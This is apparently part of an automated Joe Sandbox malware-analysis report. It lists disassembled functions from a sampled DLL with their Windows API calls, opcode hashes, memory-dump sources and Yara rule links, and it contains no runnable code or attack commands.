                                                                                                                                                                    • Instruction ID: 6afe108593f5a5b3b6ae20c4d97b56e74a9d46c06e0c05ca8afe2fec5f6e2bc5
                                                                                                                                                                    • Opcode Fuzzy Hash: 0bf65f0da40171ee638707cf269d2bb20f1598853ffc4a69b58c8d846a67d364
                                                                                                                                                                    • Instruction Fuzzy Hash: FF81B978A01209DFDB08DF55D080AAEBBB2FF88350F248159EC499B355D775EA81CB98
                                                                                                                                                                    Function 5BB38BB5 Relevance: 12.1, APIs: 8, Instructions: 79stringwindowmemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _SendMessage@16.FONDUE(?,00000466,?,?), ref: 5BB38BD5
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB38BE9
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB38C12
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 5BB38C33
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 5BB38C40
                                                                                                                                                                    • _SendMessage@16.FONDUE(?,00000466,?,00000000), ref: 5BB38C5A
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 5BB38C76
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB38C83
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharGlobalMessage@16MultiSendWidelstrlen$AllocFree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 559837489-0
                                                                                                                                                                    • Opcode ID: 7d503c574b1bb77846c3655609ca3e72deaa09b1007aa7541d8f5377833cd8eb
                                                                                                                                                                    • Instruction ID: 49e6a8a00100dc3da80ad0077e4f2cd83a2ab268223cb2c3a0b1d2a1593ad430
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d503c574b1bb77846c3655609ca3e72deaa09b1007aa7541d8f5377833cd8eb
                                                                                                                                                                    • Instruction Fuzzy Hash: 1631ECB5E00209BFDB04DFD8C845FBEB7B9FB48700F108159FA14A7284D6B5AA40DBA5
                                                                                                                                                                    Function 5BB3BF90 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3BFB4
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFC4
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFE1
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFFE
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3C034
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3C044
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3C054
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2933462567-0
                                                                                                                                                                    • Opcode ID: 282f1ecc40d1c3fcd6310e711a16570b67b82778b5815e8426d672c8ba0b0641
                                                                                                                                                                    • Instruction ID: cd61925089f64557de00c77e863698e2e42172ca2950e6fbc49bd8f366a6bcce
                                                                                                                                                                    • Opcode Fuzzy Hash: 282f1ecc40d1c3fcd6310e711a16570b67b82778b5815e8426d672c8ba0b0641
                                                                                                                                                                    • Instruction Fuzzy Hash: 4D2125B5D00249EFDB01DFE0C848BAEB7B4FB04305F108569E411A7284D7FA9A84EF95
                                                                                                                                                                    Function 5BB39BE7 Relevance: 12.1, APIs: 8, Instructions: 67stringmemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CharLowerW.USER32(?), ref: 5BB39BFA
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB39C0F
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB39C38
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB39C57
                                                                                                                                                                    • CharLowerA.USER32(?), ref: 5BB39C64
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 5BB39C71
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB39C8C
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB39C99
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Char$ByteGlobalLowerMultiWidelstrlen$AllocFree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 434613974-0
                                                                                                                                                                    • Opcode ID: be6cd5741e48f0bb0fe5f6489410ccb9cb4e9ed5885e87f0cdb97671d6c308f2
                                                                                                                                                                    • Instruction ID: c18ed40c5d4a7a8502386fae04a0a5d3e83a635e692e35cd3794b362e9c86e6f
                                                                                                                                                                    • Opcode Fuzzy Hash: be6cd5741e48f0bb0fe5f6489410ccb9cb4e9ed5885e87f0cdb97671d6c308f2
                                                                                                                                                                    • Instruction Fuzzy Hash: 2A2110B5900209FFDB14DF98C949BAEBBB5FB48301F104219FA15A7280D7F19A80DB94
                                                                                                                                                                    Function 5BB32B80 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB32B9D
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB32BAD
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideCharSize.FONDUE(00000000,?), ref: 5BB32BCC
                                                                                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 5BB32BF7
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,?), ref: 5BB32C1E
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB32C2E
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB32C3E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$From$FreeGlobal$DateErrorFormatLastSize
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4159601105-0
                                                                                                                                                                    • Opcode ID: 08537d5dbb77858840881d1369c1337191a989242bb33f8ddc2fe772082b89eb
                                                                                                                                                                    • Instruction ID: d56b9f61a63688724d7fd1a84db1c3163be83414f68e3df09ecfaac852bac220
                                                                                                                                                                    • Opcode Fuzzy Hash: 08537d5dbb77858840881d1369c1337191a989242bb33f8ddc2fe772082b89eb
                                                                                                                                                                    • Instruction Fuzzy Hash: 2D21F4B1900208EFDF15DF94C889BDEBBB9FB48301F108558E510A7280D7F99A84DFA5
                                                                                                                                                                    Function 5BB377F8 Relevance: 10.6, APIs: 7, Instructions: 69memorystringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WinHelpW.USER32(?,?,?,?), ref: 5BB37817
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 5BB37826
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB37840
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 5BB3785F
                                                                                                                                                                    • WinHelpA.USER32(?,?,?,?), ref: 5BB37878
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 5BB37893
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB378A0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharGlobalHelpMultiWide$AllocFreelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2086232016-0
                                                                                                                                                                    • Opcode ID: ba24292599b7b14521add45d14bf796316ae49e153f4845277edf373ab677d73
                                                                                                                                                                    • Instruction ID: dd8ffd12c12e0dc28f470cb205553c33ba8604dc2afefe411336d75df91c50c7
                                                                                                                                                                    • Opcode Fuzzy Hash: ba24292599b7b14521add45d14bf796316ae49e153f4845277edf373ab677d73
                                                                                                                                                                    • Instruction Fuzzy Hash: C8210CB6A00109BFDB04DF98C844FAF77B9FB48710F108219FA19A7284D7B1E940DB65
                                                                                                                                                                    Function 5BB387B8 Relevance: 9.1, APIs: 6, Instructions: 64windowmemorystringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadIconW.USER32(?,?), ref: 5BB387CF
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 5BB387F5
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3880F
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 5BB3882E
                                                                                                                                                                    • LoadIconA.USER32(?,00000000), ref: 5BB38847
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB38863
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: GlobalIconLoad$AllocByteCharFreeMultiWidelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1819427946-0
                                                                                                                                                                    • Opcode ID: e4f5fa51340c2dae22360ea363990daaa42bbfcbe0bc9af3485c43681712bef2
                                                                                                                                                                    • Instruction ID: 93b27215f3b7c86335d313cc3d84cc23f256533cc14e065162daa3ccf44e39c8
                                                                                                                                                                    • Opcode Fuzzy Hash: e4f5fa51340c2dae22360ea363990daaa42bbfcbe0bc9af3485c43681712bef2
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D21F9B5A00109BFDB04DF98C944BBEB7B6FB48710F108229F919A7284D6B1DA41DB65
                                                                                                                                                                    Function 5BB44382 Relevance: 9.1, APIs: 6, Instructions: 63memorystringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB44392
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB443BB
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB443DA
                                                                                                                                                                    • CreateWindowStationA.USER32(?,?,?,?), ref: 5BB443F3
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB4440E
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB4441B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AllocCreateFreeStationWindowlstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 61863157-0
                                                                                                                                                                    • Opcode ID: 77be3c7843cc1d91420ef63c686bf0ca9697a30c1c42bed64eaf4fb4d6358594
                                                                                                                                                                    • Instruction ID: bd7cb8753f40c03d1de7eeedb3e492252aff23a24105829c0778da8e66c0cc8d
                                                                                                                                                                    • Opcode Fuzzy Hash: 77be3c7843cc1d91420ef63c686bf0ca9697a30c1c42bed64eaf4fb4d6358594
                                                                                                                                                                    • Instruction Fuzzy Hash: C72100B5A00209BFDB00DFD8C845FAFBBB5FB48710F108219FA15A7284D7B19A40DBA5
                                                                                                                                                                    Function 5BB43BF0 Relevance: 9.1, APIs: 6, Instructions: 57memorystringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB43C00
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB43C29
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB43C48
                                                                                                                                                                    • GetKeyboardLayoutNameA.USER32(?), ref: 5BB43C55
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB43C70
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB43C7D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AllocFreeKeyboardLayoutNamelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1703440718-0
                                                                                                                                                                    • Opcode ID: a808f8f051319b81cd8f454bac250635642461f678f64b8cb99e98d01af297f0
                                                                                                                                                                    • Instruction ID: 277953bbfa3e2fb64ebdab68ab80a5375c8f22e91708d3d33aa31a757827fadf
                                                                                                                                                                    • Opcode Fuzzy Hash: a808f8f051319b81cd8f454bac250635642461f678f64b8cb99e98d01af297f0
                                                                                                                                                                    • Instruction Fuzzy Hash: 0011FEB5900609BFDB00DFD8C845BBEBBB5FB48700F104219FA15A7284C6B19A40DBA5
                                                                                                                                                                    Function 5BB3BBAA Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3BBC7
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BBD7
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BBF4
                                                                                                                                                                    • GetProfileIntA.KERNEL32(00000000,00000000,?), ref: 5BB3BC13
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3BC26
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3BC36
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLastProfile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3090023961-0
                                                                                                                                                                    • Opcode ID: 52afdf9915e8b243ec405ab6aae1891e4d7bd9f2b5e7096e478a0b0e9909bcca
                                                                                                                                                                    • Instruction ID: 0cc18e00ffacb26c8ec14454df6978653983d53d37e2a9a17befb549158f8e60
                                                                                                                                                                    • Opcode Fuzzy Hash: 52afdf9915e8b243ec405ab6aae1891e4d7bd9f2b5e7096e478a0b0e9909bcca
                                                                                                                                                                    • Instruction Fuzzy Hash: D21106B5D00208EFDB21DFA4C448B9EB7B4FB04305F54C069E415AB284DBFA9A84EF55
                                                                                                                                                                    Function 5BB3D7E7 Relevance: 9.0, APIs: 6, Instructions: 50fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3D804
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3D814
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3D831
                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,?), ref: 5BB3D850
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3D863
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3D873
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$CopyErrorFileLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4228768975-0
                                                                                                                                                                    • Opcode ID: f9ec435e2ce9b86f9b62f2669374f881163214e5d94240050c2bf3eeb21d168a
                                                                                                                                                                    • Instruction ID: 886fe1ae14417d56e99421c5aedeea24c52fdf46f82f677d89d488809bb987a4
                                                                                                                                                                    • Opcode Fuzzy Hash: f9ec435e2ce9b86f9b62f2669374f881163214e5d94240050c2bf3eeb21d168a
                                                                                                                                                                    • Instruction Fuzzy Hash: 8A1106B5D00208EFDB00EFE9D849B9DBBB5FB44305F108069E415A7280D7BAA684DF45
                                                                                                                                                                    Function 5BB3DFFD Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3E01A
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3E02A
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3E047
                                                                                                                                                                    • OpenBackupEventLogA.ADVAPI32(00000000,00000000), ref: 5BB3E062
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3E075
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3E085
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$BackupErrorEventLastOpen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2071961401-0
                                                                                                                                                                    • Opcode ID: 085f1ba403e277487cc99644af47a76e16b2c88edc31be117e518147abacaeec
                                                                                                                                                                    • Instruction ID: 089eeccd11800b75f8aabc9222abd28de41ed427cff8680862ed34ef72e94277
                                                                                                                                                                    • Opcode Fuzzy Hash: 085f1ba403e277487cc99644af47a76e16b2c88edc31be117e518147abacaeec
                                                                                                                                                                    • Instruction Fuzzy Hash: E511A8B5D00608EFDB01DFA0C489B9EBBB5FB44305F10C16AE51567280D7BA9688DF65
                                                                                                                                                                    Function 5BB457FA Relevance: 7.6, APIs: 5, Instructions: 62memorystringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB45820
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB45849
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000), ref: 5BB45868
                                                                                                                                                                    • LoadAcceleratorsA.USER32(?,00000000), ref: 5BB45881
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB4589E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
